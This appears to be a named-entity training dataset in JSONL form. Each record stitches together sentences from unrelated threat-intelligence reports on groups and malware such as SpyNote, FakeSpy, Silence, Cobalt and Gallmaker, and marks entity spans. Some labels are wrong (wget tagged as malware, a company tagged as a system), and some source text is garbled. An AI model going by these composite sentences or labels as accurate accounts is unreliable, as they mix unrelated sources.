{"text": "Command execution Command execution can create havoc for victim if the malware developer decides to execute commands in the victim \u2019 s device . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . Against targets in the CIS countries , the Cobalt also used their own infrastructure , which included rented dedicated servers .", "spans": [{"start": 209, "end": 216, "label": "Vulnerability"}, {"start": 225, "end": 253, "label": "Vulnerability"}, {"start": 299, "end": 305, "label": "Organization"}]}
{"text": "Leveraging this feature , the malware developer can root the device using a range of vulnerabilities , well-known or zero-day . Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled \u0414\u043e\u0433\u043e\u0432\u043e\u0440.doc\u201d [Contract.doc] . In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia .", "spans": [{"start": 128, "end": 136, "label": "Organization"}, {"start": 198, "end": 233, "label": "Malware"}, {"start": 294, "end": 300, "label": "Organization"}]}
{"text": "The following screenshot shows the command execution functionality in action : The paramString parameter shown in the above screenshot can be any command received from C & C . Silence sent out emails to Russian banks . To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software .", "spans": [{"start": 176, "end": 183, "label": "Organization"}, {"start": 211, "end": 216, "label": "Organization"}, {"start": 308, "end": 320, "label": "Organization"}, {"start": 351, "end": 357, "label": "Malware"}, {"start": 362, "end": 368, "label": "Malware"}]}
{"text": "Screen capture and audio recording SpyNote RAT was able to take screen captures and , using the device \u2019 s microphone , listen to audio conversations . The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . Artifacts indicated the involvement of the Cobalt that , according to Positive Technologies information , from August to October had performed similar successful attacks in Eastern Europe , and it 's likely that this group may will soon become active in the West .", "spans": [{"start": 35, "end": 46, "label": "Malware"}, {"start": 156, "end": 163, "label": "Vulnerability"}, {"start": 173, "end": 182, "label": "Organization"}, {"start": 204, "end": 222, "label": "Malware"}, {"start": 297, "end": 303, "label": "Organization"}, {"start": 333, "end": 357, "label": "Organization"}]}
{"text": "This capability was confirmed when the Android permission , called android.permission.RECORD_AUDIO , was being requested along with code found in the app . Silence conducted a massive phishing campaign posing as the Central Bank of the Russian Federation . In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike .", "spans": [{"start": 39, "end": 46, "label": "System"}, {"start": 67, "end": 98, "label": "Indicator"}, {"start": 156, "end": 163, "label": "Organization"}, {"start": 216, "end": 228, "label": "Organization"}, {"start": 299, "end": 319, "label": "Organization"}, {"start": 366, "end": 375, "label": "Organization"}, {"start": 441, "end": 454, "label": "Malware"}]}
{"text": "SpyNote RAT captured the device \u2019 s screen activities along with audio using the MediaProjectionCallback functionality ( available with Lollipop , the Android 5.0 release , and later ) and saved the output in a file named \" video.mp4 '' as shown in the following screenshot SMS stealing SpyNote RAT was also observed stealing SMS messages from the affected devices , as shown in screenshot below : Stealing contacts The ability to steal contacts is a favorite feature for spyware developers , as the stolen contacts can be used to further spread the spyware Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence\u2019s Trojan , known as Silence.MainModule . The basic principles of targeted attacks on financial institutions have not changed since 2013 when the Anunak , Corkow , Buhtrap , and Lurk groups began conducting the first attacks on Russian banks .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 136, "end": 144, "label": "System"}, {"start": 151, "end": 162, "label": "System"}, {"start": 224, "end": 233, "label": "Indicator"}, {"start": 287, "end": 298, "label": "Malware"}, {"start": 558, "end": 566, "label": "Organization"}, {"start": 669, "end": 678, "label": "Organization"}, {"start": 762, "end": 784, "label": "Organization"}, {"start": 822, "end": 828, "label": "Organization"}, {"start": 831, "end": 837, "label": "Malware"}, {"start": 840, "end": 847, "label": "Organization"}, {"start": 854, "end": 865, "label": "Organization"}, {"start": 912, "end": 917, "label": "Organization"}]}
{"text": ". Silence attacked financial organisations in the UK . In a recent spear-phishing campaign , the Cobalt Group used a known CVE to connect to its C&C server via Cobalt Strike , but ended up revealing all targets .", "spans": [{"start": 2, "end": 9, "label": "Organization"}, {"start": 19, "end": 28, "label": "Organization"}, {"start": 97, "end": 109, "label": "Organization"}, {"start": 145, "end": 148, "label": "System"}, {"start": 160, "end": 173, "label": "Malware"}]}
{"text": "The following screenshot shows the contacts being stolen and written in a local array , which is then sent to C & C : Uninstalling apps Uninstalling apps is another function favored by developers of Android spyware and malware . Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software . This isn't the first time we've seen Cobalt makes this error\u2014back in March , an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw .", "spans": [{"start": 199, "end": 206, "label": "System"}, {"start": 229, "end": 236, "label": "Organization"}, {"start": 513, "end": 519, "label": "Organization"}, {"start": 597, "end": 619, "label": "Organization"}]}
{"text": "They tend to target any antivirus protections on the device and uninstall them , which increases the possibility of their malware persisting on the device . The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks . The Carbanak attacks targeting over a 100 financial institutions worldwide .", "spans": [{"start": 161, "end": 170, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 306, "end": 328, "label": "Organization"}]}
{"text": "Following screenshot shows this functionality in action : Other functions In addition to the functionalities we \u2019 ve described , the SpyNote RAT was exhibiting many other behaviors that make it more robust than most off-the-shelf malware . On 24 March 2019 , Silence.ProxyBot (MD5 2fe01a04d6beef14555b2cf9a717615c) was uploaded to VirusTotal from an IP address in Sri Lanka . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police .", "spans": [{"start": 133, "end": 144, "label": "Malware"}, {"start": 259, "end": 275, "label": "Malware"}, {"start": 394, "end": 404, "label": "Organization"}, {"start": 416, "end": 424, "label": "Malware"}, {"start": 473, "end": 495, "label": "Organization"}]}
{"text": "SpyNote RAT was designed to function only over Wi-Fi , which is the preferable mode for Android malware to send files to C & C . On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign . Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 88, "end": 95, "label": "System"}, {"start": 158, "end": 163, "label": "Organization"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 268, "end": 274, "label": "Organization"}, {"start": 300, "end": 305, "label": "Organization"}, {"start": 310, "end": 332, "label": "Organization"}]}
{"text": "The screenshot below shows SpyNote RAT scanning for Wi-Fi and enabling it if a known channel is found : Additional features - SpyNote RAT could click photos using the device 's camera , based on commands from C & C . Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": [{"start": 27, "end": 38, "label": "Malware"}, {"start": 126, "end": 137, "label": "Malware"}, {"start": 217, "end": 225, "label": "Organization"}, {"start": 345, "end": 360, "label": "Organization"}, {"start": 386, "end": 391, "label": "Organization"}, {"start": 394, "end": 403, "label": "Organization"}, {"start": 416, "end": 438, "label": "Organization"}, {"start": 488, "end": 496, "label": "Malware"}, {"start": 501, "end": 507, "label": "Malware"}]}
{"text": "- There were two interesting sub-classes found inside Main Activity : Receiver and Sender . According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months . The organised crime group started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world .", "spans": [{"start": 135, "end": 142, "label": "Organization"}, {"start": 192, "end": 196, "label": "Organization"}, {"start": 397, "end": 419, "label": "Organization"}]}
{"text": "Receiver was involved in receiving commands from the Server and the main functionality of Sender was to send all the data collected to the C & C over Wi-Fi . To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . One of the Cobalt Group 's latest campaigns , an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor , was investigated and presented by the Talos research team .", "spans": [{"start": 216, "end": 226, "label": "System"}, {"start": 251, "end": 258, "label": "Organization"}, {"start": 324, "end": 336, "label": "Malware"}, {"start": 391, "end": 395, "label": "Organization"}, {"start": 409, "end": 421, "label": "Organization"}, {"start": 470, "end": 476, "label": "Malware"}, {"start": 477, "end": 490, "label": "Malware"}, {"start": 498, "end": 517, "label": "Malware"}, {"start": 558, "end": 563, "label": "Organization"}]}
{"text": "- SpyNote RAT was also collecting the device \u2019 s location to identify the exact location of the victim . As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . The Cobalt started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 124, "end": 132, "label": "Organization"}, {"start": 167, "end": 174, "label": "Organization"}, {"start": 201, "end": 223, "label": "Malware"}, {"start": 249, "end": 255, "label": "Organization"}, {"start": 406, "end": 428, "label": "Organization"}]}
{"text": "SpyNote RAT builder The SpyNote Remote Access Trojan ( RAT ) builder is gaining popularity in the hacking community , so we decided to study its pervasiveness . In February 2019 , Russian media7 reported a Silence attack on IT Bank in the city of Omsk . The Cobalt group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 24, "end": 31, "label": "Malware"}, {"start": 258, "end": 270, "label": "Organization"}, {"start": 279, "end": 292, "label": "Malware"}, {"start": 328, "end": 340, "label": "Organization"}, {"start": 352, "end": 374, "label": "Organization"}]}
{"text": "What we found were several other fake apps developed using the SpyNote builder , which should come as a warning to Android users . On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 (see section \u2018Attack timeline\u2019) . The hacking group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia .", "spans": [{"start": 63, "end": 70, "label": "Malware"}, {"start": 115, "end": 122, "label": "System"}, {"start": 152, "end": 159, "label": "Organization"}, {"start": 258, "end": 267, "label": "Organization"}, {"start": 344, "end": 357, "label": "Malware"}, {"start": 393, "end": 405, "label": "Organization"}, {"start": 417, "end": 439, "label": "Organization"}]}
{"text": "Some of the targeted apps were : Whatsapp YouTube Video Downloader Google Update Instagram Hack Wifi AirDroid WifiHacker Facebook Photoshop SkyTV Hotstar Trump Dash PokemonGo With many more to come . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails . If successful , Cobalt goes on to attack financial institutions outside the country .", "spans": [{"start": 33, "end": 41, "label": "System"}, {"start": 42, "end": 66, "label": "System"}, {"start": 67, "end": 80, "label": "System"}, {"start": 81, "end": 90, "label": "System"}, {"start": 91, "end": 100, "label": "System"}, {"start": 101, "end": 109, "label": "System"}, {"start": 110, "end": 120, "label": "System"}, {"start": 121, "end": 129, "label": "System"}, {"start": 130, "end": 139, "label": "System"}, {"start": 140, "end": 145, "label": "System"}, {"start": 146, "end": 153, "label": "System"}, {"start": 154, "end": 164, "label": "System"}, {"start": 165, "end": 174, "label": "System"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 263, "end": 267, "label": "Organization"}, {"start": 268, "end": 277, "label": "Organization"}, {"start": 338, "end": 344, "label": "Organization"}, {"start": 363, "end": 385, "label": "Organization"}]}
{"text": "Furthermore , we found that in just the first two weeks of 2017 , there have been more than 120 such spyware variants already built using the same SpyNote Trojan builder as SpyNote RAT and roaming in the wild . The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . The vulnerability was used to retrieve and execute Cobalt Strike from a remote server they controlled .", "spans": [{"start": 147, "end": 154, "label": "Malware"}, {"start": 173, "end": 184, "label": "Malware"}, {"start": 228, "end": 246, "label": "Malware"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 367, "end": 380, "label": "Malware"}]}
{"text": "A complete list of sample hashes is available here . Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . As part of our monitoring of Iranian threat agents activities , we have detected that since October 2016 and until the end of January 2017 , the Jerusalem Post , as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens .", "spans": [{"start": 53, "end": 71, "label": "Malware"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 149, "end": 156, "label": "Malware"}, {"start": 181, "end": 198, "label": "Malware"}, {"start": 235, "end": 250, "label": "Malware"}, {"start": 433, "end": 447, "label": "Organization"}, {"start": 516, "end": 537, "label": "Organization"}, {"start": 579, "end": 590, "label": "Organization"}]}
{"text": "Conclusion The days when one needed in-depth coding knowledge to develop malware are long gone . Since at least 2011 , these hackers have been using malware to spy on corporate networks . CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date , and are analyzed in this report : TDTESS backdoor ; Vminst , a lateral movement tool ; NetSrv , a Cobalt Strike loader ; and ZPP , a files compression console program .", "spans": [{"start": 125, "end": 132, "label": "Organization"}, {"start": 149, "end": 156, "label": "System"}, {"start": 188, "end": 199, "label": "Organization"}, {"start": 334, "end": 349, "label": "Malware"}, {"start": 352, "end": 358, "label": "Malware"}, {"start": 387, "end": 393, "label": "Malware"}, {"start": 398, "end": 418, "label": "Malware"}, {"start": 425, "end": 428, "label": "Malware"}]}
{"text": "Nowadays , script kiddies can build a piece of malware that can create real havoc . Hackers are targeting high-tech companies as well as chemical and pharmaceutical companies . CopyKittens often uses the trial version of Cobalt Strike , a publicly available commercial software for \" Adversary Simulations and Red Team Operations \" .", "spans": [{"start": 84, "end": 91, "label": "Organization"}, {"start": 106, "end": 125, "label": "Organization"}, {"start": 137, "end": 145, "label": "Organization"}, {"start": 150, "end": 164, "label": "Organization"}, {"start": 177, "end": 188, "label": "Organization"}, {"start": 221, "end": 234, "label": "Malware"}]}
{"text": "Moreover , there are many toolkits like the SpyNote Trojan builder that enable users to build malware with ease and few clicks . The hackers will map a company\u2019s network and look for strategically favorable locations for placing their malware . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent .", "spans": [{"start": 44, "end": 51, "label": "Malware"}, {"start": 133, "end": 140, "label": "Organization"}, {"start": 276, "end": 287, "label": "Organization"}, {"start": 292, "end": 302, "label": "Malware"}, {"start": 378, "end": 385, "label": "Vulnerability"}, {"start": 425, "end": 433, "label": "Malware"}, {"start": 500, "end": 506, "label": "Malware"}, {"start": 511, "end": 521, "label": "Malware"}, {"start": 526, "end": 532, "label": "System"}]}
{"text": "In particular , avoid side-loading apps from third-party app stores and avoid the temptation to play games that are not yet available on Android . The corporation conrms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions.\u201d Henkel claims that a very small portion\u201d of its worldwide IT systems had been aected \u2014 the systems in Germany . The group , which we have given the name Gallmaker , has been operating since at least December 2017 , with its most recent activity observed in June 2018 .", "spans": [{"start": 137, "end": 144, "label": "System"}, {"start": 174, "end": 180, "label": "Organization"}, {"start": 485, "end": 494, "label": "Organization"}]}
{"text": "Yes , we are talking about SuperMarioRun , which was recently launched by Nintendo only for iOS users . A BASF spokeswoman tells us in an email that in July 2015 , hackers had successfully overcome the rst levels\u201d of defense . Rather , the Gallmaker 's attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools .", "spans": [{"start": 27, "end": 40, "label": "System"}, {"start": 74, "end": 82, "label": "Organization"}, {"start": 92, "end": 95, "label": "System"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 314, "end": 318, "label": "Malware"}, {"start": 331, "end": 360, "label": "Malware"}]}
{"text": "Recent blogs by the Zscaler research team explain how some variants of Android malware are exploiting the popularity of this game and tricking Android users into downloading a fake version . The tool was written by sta of Thyssenkrupp , because the industrial giant\u2014company number eleven\u2014had been spied on by Winnti . Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 71, "end": 78, "label": "Malware"}, {"start": 143, "end": 150, "label": "System"}, {"start": 222, "end": 234, "label": "System"}, {"start": 309, "end": 315, "label": "Organization"}, {"start": 318, "end": 327, "label": "Organization"}, {"start": 359, "end": 366, "label": "Vulnerability"}, {"start": 371, "end": 409, "label": "System"}, {"start": 412, "end": 415, "label": "System"}]}
{"text": "( Have a look here and here . Hackers are charged with spying on a manufacturer of gas turbines . Should a user enable this content , the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim 's system .", "spans": [{"start": 30, "end": 37, "label": "Organization"}, {"start": 67, "end": 79, "label": "Organization"}, {"start": 138, "end": 147, "label": "Organization"}, {"start": 173, "end": 185, "label": "Malware"}]}
{"text": ") You should also avoid the temptation to play games from sources other than legitimate app stores ; such games are not safe and may bring harm to your reputation and your bank account . The Hong Kong government was spied on by the Winnti hackers . Back in 2013 , CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news , an Israeli newspaper .", "spans": [{"start": 232, "end": 238, "label": "Organization"}, {"start": 264, "end": 275, "label": "Organization"}, {"start": 289, "end": 297, "label": "Organization"}]}
{"text": "FakeSpy Masquerades as Postal Service Apps Around the World July 1 , 2020 KEY FINDINGS The Cybereason Nocturnus team is investigating a new campaign involving FakeSpy , an Android mobile malware that emerged around October 2017 . Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX . Gallmaker 's activity appears to be highly targeted , with its victims all related to government , military , or defense sectors .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 91, "end": 111, "label": "Organization"}, {"start": 159, "end": 166, "label": "Malware"}, {"start": 172, "end": 179, "label": "System"}, {"start": 230, "end": 237, "label": "System"}, {"start": 274, "end": 279, "label": "Organization"}, {"start": 351, "end": 360, "label": "Organization"}, {"start": 437, "end": 447, "label": "Organization"}, {"start": 450, "end": 458, "label": "Organization"}, {"start": 464, "end": 479, "label": "Organization"}]}
{"text": "FakeSpy is an information stealer used to steal SMS messages , send SMS messages , steal financial data , read account information and contact lists , steal application data , and do much more . While OceanLotus\u2019 targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam . Gallmaker 's targets are embassies of an Eastern European country .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 201, "end": 212, "label": "Organization"}, {"start": 365, "end": 384, "label": "Organization"}, {"start": 387, "end": 396, "label": "Organization"}, {"start": 403, "end": 413, "label": "Organization"}, {"start": 437, "end": 446, "label": "Organization"}, {"start": 462, "end": 471, "label": "Organization"}]}
{"text": "FakeSpy first targeted South Korean and Japanese speakers . NewsBeef attacks against Saudi Arabian organizations and individuals (as well as targets in the European Union) are likely to continue . There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 60, "end": 68, "label": "Organization"}, {"start": 303, "end": 312, "label": "Organization"}, {"start": 343, "end": 350, "label": "Organization"}, {"start": 353, "end": 361, "label": "Organization"}, {"start": 368, "end": 386, "label": "Organization"}]}
{"text": "However , it has begun to target users all around the world , especially users in countries like China , Taiwan , France , Switzerland , Germany , United Kingdom , United States , and others . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the APT10 during the compromise and was able to attribute data that was placed into it as being owned by Visma . The group has carried out attacks most months since December 2017 .", "spans": [{"start": 193, "end": 199, "label": "Organization"}, {"start": 290, "end": 295, "label": "Organization"}]}
{"text": "FakeSpy masquerades as legitimate postal service apps and transportation services in order to gain the users ' trust . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . Its activity subsequently increased in the second quarter of 2018 , with a particular spike in April 2018 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 119, "end": 125, "label": "Organization"}, {"start": 141, "end": 146, "label": "Organization"}, {"start": 171, "end": 183, "label": "Malware"}]}
{"text": "Once installed , the application requests permissions so that it may control SMS messages and steal sensitive data on the device , as well as proliferate to other devices in the target device \u2019 s contact list . These RAT families are discussed in Novetta\u2019s other report on the Lazarus Group\u2019s RAT and Staging capabilities . The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect .", "spans": [{"start": 247, "end": 256, "label": "Organization"}, {"start": 277, "end": 284, "label": "Organization"}, {"start": 338, "end": 347, "label": "Organization"}, {"start": 379, "end": 383, "label": "Malware"}, {"start": 396, "end": 425, "label": "Malware"}]}
{"text": "Cybereason 's investigation shows that the threat actor behind the FakeSpy campaign is a Chinese-speaking group dubbed \" Roaming Mantis '' , a group that has led similar campaigns . \bMagic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . The Gamaredon Group primarily makes use of compromised domains , dynamic DNS providers , Russian and Ukrainian country code top-level domains ( ccTLDs ) , and Russian hosting providers to distribute their custom-built malware .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 67, "end": 74, "label": "Malware"}, {"start": 121, "end": 135, "label": "Organization"}, {"start": 182, "end": 194, "label": "Organization"}, {"start": 239, "end": 245, "label": "Organization"}, {"start": 248, "end": 258, "label": "Organization"}, {"start": 265, "end": 275, "label": "Organization"}, {"start": 355, "end": 370, "label": "Organization"}, {"start": 416, "end": 437, "label": "Organization"}, {"start": 518, "end": 535, "label": "Organization"}, {"start": 556, "end": 568, "label": "Malware"}, {"start": 569, "end": 576, "label": "Malware"}]}
{"text": "FakeSpy has been in the wild since 2017 ; this latest campaign indicates that it has become more powerful . \bSince at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . Gallmaker may well have continued to avoid detection were it not for Symantec 's technology .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 150, "end": 155, "label": "Organization"}, {"start": 161, "end": 168, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}, {"start": 257, "end": 264, "label": "Organization"}, {"start": 267, "end": 276, "label": "Organization"}, {"start": 281, "end": 294, "label": "Organization"}, {"start": 311, "end": 320, "label": "Organization"}, {"start": 380, "end": 388, "label": "Organization"}]}
{"text": "Code improvements , new capabilities , anti-emulation techniques , and new , global targets all suggest that this malware is well-maintained by its authors and continues to evolve . \bCTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash . In this instance , Symantec identified the specific PowerShell commands used by Gallmaker as being suspicious , leading to the discovery of this new campaign .", "spans": [{"start": 182, "end": 186, "label": "Organization"}, {"start": 361, "end": 368, "label": "Organization"}, {"start": 390, "end": 398, "label": "Organization"}, {"start": 423, "end": 442, "label": "Malware"}, {"start": 451, "end": 460, "label": "Organization"}]}
{"text": "TABLE OF CONTENTS Key Findings Introduction Threat Analysis Fakespy Code Analysis Dynamic Library Loading Stealing Sensitive Information Anti-Emulator Techniques Under Active Development Who is Behind Fakespy 's Smishing Campaigns ? \bCTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . Without Symantec 's advanced AI-based capabilities , Gallmaker 's activities may well have remained undetected .", "spans": [{"start": 60, "end": 67, "label": "Malware"}, {"start": 201, "end": 208, "label": "Malware"}, {"start": 233, "end": 237, "label": "Organization"}, {"start": 264, "end": 276, "label": "Organization"}, {"start": 388, "end": 396, "label": "Organization"}, {"start": 433, "end": 442, "label": "Organization"}]}
{"text": "Conclusions Cybereason Mobile Detects and Stops FakeSpy Indicators of Compromise INTRODUCTION For the past several weeks , Cybereason has been investigating a new version of Android malware dubbed FakeSpy , which was first identified in October 2017 and reported again in October 2018 . \bCharacterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East (including targets inside Iran itself) , as well as across Europe and in the United States . Previously , LookingGlass reported on a campaign they named \" Operation Armageddon \" , targeting individuals involved in the Ukrainian military and national security establishment .", "spans": [{"start": 12, "end": 29, "label": "Organization"}, {"start": 48, "end": 55, "label": "Malware"}, {"start": 123, "end": 133, "label": "Organization"}, {"start": 174, "end": 181, "label": "System"}, {"start": 197, "end": 204, "label": "Malware"}, {"start": 390, "end": 401, "label": "Organization"}, {"start": 566, "end": 578, "label": "Organization"}, {"start": 688, "end": 696, "label": "Organization"}]}
{"text": "A new campaign is up and running using newly improved , significantly more powerful malware as compared to previous versions . These malware families have a rich history of being used in many targeted attacks against government and private organizations . The earliest discovered sample ( based on compile times and sandbox submission times ) distributed by this threat group resembles the descriptions of Gamaredon provided by Symantec and Trend Micro .", "spans": [{"start": 133, "end": 140, "label": "Malware"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 232, "end": 239, "label": "Organization"}, {"start": 240, "end": 253, "label": "Organization"}, {"start": 406, "end": 415, "label": "Organization"}, {"start": 428, "end": 436, "label": "Organization"}, {"start": 441, "end": 452, "label": "Organization"}]}
{"text": "FakeSpy is under active development and is evolving rapidly ; new versions are released every week with additional evasion techniques and capabilities . The activity surfaced in Southeast Asia , a region where APT10 frequently operates . The scripts would also use wget to send POST requests to command and control ( C2 ) servers that would contain information about the compromised system .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 210, "end": 215, "label": "Organization"}, {"start": 265, "end": 269, "label": "Malware"}, {"start": 317, "end": 319, "label": "System"}]}
{"text": "Our analysis shows that the threat actor behind the FakeSpy malware is a Chinese-speaking group , commonly referred to as \" Roaming Mantis '' , a group that is known to have launched similar campaigns in the past . The samples we analyzed originated from the Philippines . These VNC exectuables would either be included in the SFX file or downloaded by the batch script .", "spans": [{"start": 52, "end": 59, "label": "Malware"}, {"start": 124, "end": 138, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 279, "end": 282, "label": "Malware"}]}
{"text": "FakeSpy is an information stealer that exfiltrates and sends SMS messages , steals financial and application data , reads account information and contact lists , and more . APT10 frequently targets the Southeast Asia region . The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 173, "end": 178, "label": "Organization"}, {"start": 274, "end": 277, "label": "Malware"}, {"start": 321, "end": 323, "label": "System"}]}
{"text": "The malware uses smishing , or SMS phishing , to infiltrate target devices , which is a technique that relies on social engineering . Both of the loader\u2019s variants and their various payloads that enSilo analyzed share similar Tactics , Techniques , and Procedures (TTPs) and code associated with APT10 . While the most recent samples observed still use batch scripts and SFX files , the Gamaredon Group has moved aACT from applications like wget , Remote Manipulator MAL , VNC and ChkFlsh.exe .", "spans": [{"start": 196, "end": 202, "label": "Organization"}, {"start": 296, "end": 301, "label": "Organization"}, {"start": 353, "end": 366, "label": "Malware"}, {"start": 371, "end": 380, "label": "Malware"}, {"start": 387, "end": 402, "label": "Organization"}, {"start": 441, "end": 445, "label": "Malware"}, {"start": 448, "end": 470, "label": "Malware"}, {"start": 473, "end": 476, "label": "Malware"}, {"start": 481, "end": 492, "label": "Malware"}]}
{"text": "The attackers send fake text messages to lure the victims to click on a malicious link . Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . The threat group using these implants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian government .", "spans": [{"start": 101, "end": 106, "label": "Organization"}, {"start": 379, "end": 389, "label": "Organization"}]}
{"text": "The link directs them to a malicious web page , which prompts them to download an Android application package ( APK ) . Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file\u2019s compilation date . Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few antivirus vendors as Gamaredon .", "spans": [{"start": 166, "end": 172, "label": "Malware"}, {"start": 379, "end": 388, "label": "Organization"}]}
{"text": "This most recent FakeSpy campaign appears to target users of postal services around the world . Over the past three months , Recorded Future\u2019s Insikt Group has observed an increase in APT33\u2019s also known as Elfin infrastructure building and targeting activity , and on June 21 , 2019 , Yahoo . Periodically , researchers at Palo Alto Networks hunt through WildFire execution reports , using AutoFocus , to identify untagged samples ' artifacts in the hopes of identifying previously undiscovered malware families , behaviors , and campaigns .", "spans": [{"start": 17, "end": 24, "label": "Malware"}, {"start": 125, "end": 142, "label": "Organization"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 206, "end": 211, "label": "Organization"}, {"start": 323, "end": 341, "label": "Organization"}, {"start": 355, "end": 363, "label": "Organization"}]}
{"text": "New versions of FakeSpy masquerade as government post office apps and transportation services apps . News reported that the U.S. Cyber Command launched cyberattacks on an Iranian spy group . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries .", "spans": [{"start": 16, "end": 23, "label": "Malware"}, {"start": 124, "end": 134, "label": "Organization"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 266, "end": 274, "label": "Malware"}, {"start": 279, "end": 298, "label": "Organization"}, {"start": 400, "end": 422, "label": "Organization"}]}
